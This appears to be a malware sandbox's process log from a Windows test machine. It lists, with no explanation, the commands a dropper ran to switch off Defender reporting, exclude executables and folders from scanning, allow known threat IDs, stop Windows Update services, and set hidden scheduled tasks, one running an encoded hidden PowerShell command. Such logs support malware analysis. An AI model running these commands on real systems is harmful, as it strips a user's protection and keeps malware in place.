"schtasks" /Query /TN "DigitalPulseUpdateTask"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 2308

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gJYclSvLF" /SC once /ST 00:13:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\system32\schtasks.exe

"schtasks" /Create /TN "DigitalPulseUpdateTask" /SC HOURLY /TR "C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseUpdate.exe"

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

"C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe" 5333:::clickId=:::srcId=

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gJYclSvLF"

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gJYclSvLF"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bAutabDQFHrvmwrWbf" /SC once /ST 00:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\rJZnUge.exe\" F9 /Sbsite_idVQt 385120 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310070055461\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x1361588,0x1361598,0x13615a4

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\rJZnUge.exe

C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\rJZnUge.exe F9 /Sbsite_idVQt 385120 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Users\Admin\Pictures\cVQuTwlBIqJuiJxb3lrvqGNO.exe

"C:\Users\Admin\Pictures\cVQuTwlBIqJuiJxb3lrvqGNO.exe"

C:\Users\Admin\Pictures\VI9xk37vZ1hPxGyqkplQbk0H.exe

"C:\Users\Admin\Pictures\VI9xk37vZ1hPxGyqkplQbk0H.exe"

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OiHosHQWLYYU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OiHosHQWLYYU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YdsaQErHTmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YdsaQErHTmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gefgkCSEQETIoGatBxR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gefgkCSEQETIoGatBxR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pvBOaSctU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pvBOaSctU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tQfvhaKXOVswC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tQfvhaKXOVswC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WchZBSEVnXkPOBVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WchZBSEVnXkPOBVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\BpGCpHbZnuKjDRvE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\BpGCpHbZnuKjDRvE\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiHosHQWLYYU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiHosHQWLYYU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiHosHQWLYYU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YdsaQErHTmUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YdsaQErHTmUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gefgkCSEQETIoGatBxR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gefgkCSEQETIoGatBxR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pvBOaSctU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pvBOaSctU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tQfvhaKXOVswC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tQfvhaKXOVswC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WchZBSEVnXkPOBVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WchZBSEVnXkPOBVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\BpGCpHbZnuKjDRvE /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\BpGCpHbZnuKjDRvE /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "goylhAwiC" /SC once /ST 00:12:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

